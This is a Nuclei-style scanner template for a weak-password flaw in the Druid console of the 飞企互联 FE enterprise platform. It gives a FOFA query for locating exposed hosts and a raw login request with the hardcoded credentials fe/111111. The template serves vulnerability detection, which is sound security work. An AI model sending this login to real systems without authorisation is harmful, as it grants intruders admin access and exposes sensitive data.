id: feiqi-FE-druid-Weak-password

info:
  tags: feiqi-FE-druid-Weak-password
  name: 飞企互联-FE企业运营管理平台 druid路径 弱口令漏洞
  author: xc
  severity: high
  description: |-
    fofa: app="飞企互联-FE企业运营管理平台"
    飞企互联-FE企业运营管理平台 /druid/login.html 路径处的登录接口存在弱口令漏洞，未授权的攻击者可通过该漏洞直接进入后台管理页面，获取敏感信息，进一步利用可控制整个服务器。
  
http:
  - raw:
      - |
        POST /druid/submitLogin HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        loginUsername=fe&loginPassword=111111
    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
        - "Set-Cookie: JSESSIONID="
      - type: word
        part: body
        words:
          - 'success'
      - type: status
        status: 
        - 200
      - type: word
        negative: true  # 关键负向标记
        part: body
        words:
          - 'false'